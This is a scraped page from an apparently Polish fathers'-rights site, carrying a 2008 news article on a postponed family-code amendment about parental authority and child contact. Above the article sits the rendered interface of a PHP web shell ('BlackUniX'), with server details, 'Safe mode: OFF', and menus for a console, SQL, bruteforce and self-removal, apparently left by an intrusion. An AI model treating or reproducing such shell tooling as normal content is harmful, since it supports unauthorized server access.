W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-20 07:37:46
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.92.153.90
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Kodeks jeszcze poczeka
25.06.2008.
Nowelizacja dotycząca relacji rodzice – dzieci musi poczekać. Rząd postanowił odroczyć jej przyjęcie, dopóki resort pracy nie przygotuje ustawy o pieczy zastępczej Nowelizacja dotycząca relacji rodzice – dzieci musi poczekać. Rząd postanowił odroczyć jej przyjęcie, dopóki resort pracy nie przygotuje ustawy o pieczy zastępczej

Zmiany dotyczące pieczy zastępczej, czyli umieszczania sierot naturalnych i społecznych w domach dziecka bądź rodzinach zastępczych, były pierwotnie w noweli kodeksu rodzinnego, ale Ministerstwo Pracy wywalczyło, że to ono przedstawi swój projekt.

– To niedobrze, że po raz kolejny tak ważna nowela jest odkładana (pierwszy raz prace odwlekła przerwana kadencja rządu) – powiedział „Rz” sędzia Robert Zegadło, sekretarz Komisji Kodyfikacyjnej Prawa Cywilnego, która nowelizacje przygotowała.

Najważniejsze zmiany to: władza rodzicielska ma być mniej arbitralna, z drugiej strony rodzice mogą odmówić alimentów pełnoletniemu dziecku; o uznawaniu dziecka decydować ma wynik DNA; bardziej szczegółowe będą zasady kontaktów z dzieckiem.

Projekt zachowuje oczywiście wymóg posłuszeństwa dzieci, akceptuje jednak rosnącą samodzielność, gdy dorastają, rodzice więc przed powzięciem decyzji w ważniejszych sprawach powinni ich wysłuchać (mają też w miarę możliwości uwzględniać ich rozsądne życzenia). Bywa, że dziecko ma znaczny majątek. W takich wypadkach sąd opiekuńczy będzie mógł nakazać rodzicom sporządzenie inwentarza majątku oraz informowanie o ważniejszych operacjach.

Na wzór amerykański mają być dopuszczone (zatwierdzane przez sąd) porozumienia rodziców o sposobie wykonywania władzy rodzicielskiej i kontaktach z dzieckiem.

Kontakty z dzieckiem to pięta achillesowa prawa rodzinnego. Przed sądem obrona praw np. ojca jest zapewniona, ale są problemy z egzekucją wyroków. Wykonanie wyroku zależy w dużej mierze od dobrej woli matki, a w ponad 95 proc. spraw rozwodowych to im powierza się opiekę nad dzieckiem. Nowela podkreśla, że dziecko ma prawo do utrzymywania regularnych i bezpośrednich kontaktów z obojgiem rodziców także gdy przebywają w różnych państwach. W celu zapewnienia kontaktów kodeks pozwoli sądowi opiekuńczemu m.in. odebrać od rodziców przyrzeczenie określonego zachowania (np. że ojciec spędzi z dzieckiem przynajmniej tydzień letnich i zimowych ferii (to zmiana w kodeksie postępowania cywilnego).

– Łatwo zmieniać prawa, trudniej je wcielić. Dlatego należałoby usprawnić instytucje wspomagające rodziny w kryzysie, skonfliktowanych rodziców – powiedziała „Rz” adwokat Anisa Gnacikowska, specjalistka prawa rodzinnego.
Źródło : Rzeczpospolita Marek Domagalski
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:

Odwiedza nas 1 gość
20.06.2018.